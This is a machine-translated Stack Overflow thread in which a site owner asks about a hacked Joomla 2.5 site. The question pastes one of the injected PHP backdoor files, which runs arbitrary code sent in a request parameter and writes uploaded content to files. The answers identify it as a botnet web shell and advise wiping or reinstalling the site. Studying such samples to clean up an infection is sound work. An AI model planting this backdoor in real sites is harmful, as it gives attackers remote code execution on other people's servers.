Joomla 2.5的黑客攻击
Joomla 2.5的黑客攻击
提问于 2013-10-31 02:02:27
我有一个客户,他的Joomla网站被黑客入侵,我不太清楚这是怎么发生的,但我可以看到,有许多脚本发送垃圾邮件,在搜索包含单词eval的文件时(我发现了61个匹配的文件,如下所示:
<?php
$lbdw = "495c05e857e328e1e65ca6b0bc03dc88";
if (isset($_REQUEST['tlhqdsj'])) {
$mglvq = $_REQUEST['tlhqdsj'];
eval($mglvq);
exit();
}
if (isset($_REQUEST['ofva'])) {
$ulmajcbk = $_REQUEST['tbun'];
$cdpumv = $_REQUEST['ofva'];
$tgcjl = fopen($cdpumv, 'w');
$ogrmbcz = fwrite($tgcjl, $ulmajcbk);
fclose($tgcjl);
echo $ogrmbcz;
exit();
}
?>我不想删除整个网站,因为我没有开发它,我所需要的只是一个安全检查表和搜索其他已知的漏洞。
在安装Joomla网站的服务器上,我应该采取哪些其他预防措施?
知道他们怎么能把这么多文件上传到服务器上吗?
回答 2
Stack Overflow用户
回答已采纳
发布于 2013-10-31 02:10:12
这是一个僵尸网络PHP文件,很可能通过Joomla中的漏洞传播(例如,8月中旬有一个漏洞被披露)。它允许远程用户执行任意PHP代码并将文件上载到服务器。有关更多信息,请参见Joomla安全页面。
我最强烈的建议是擦除整个服务器--或者至少是客户的用户可以访问的任何东西--重新开始。--你永远不知道攻击者上传了什么,你永远也无法完全确定没有更多的后门存在。
如果这是不可行的,我建议擦除Joomla安装和重新安装一个新的副本Joomla 2.5.14或3.1.5。
如果您甚至不能这样做,那么您可以尝试就地升级Joomla,搜索受感染的PHP文件,并删除它们。但是,您面临的风险很大,您可能会错过一个文件,并且仍然容易受到攻击。
Stack Overflow用户
发布于 2013-10-31 04:44:07
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://stackoverflow.com/questions/19697164
复制相关文章
相似问题
腾讯云开发者
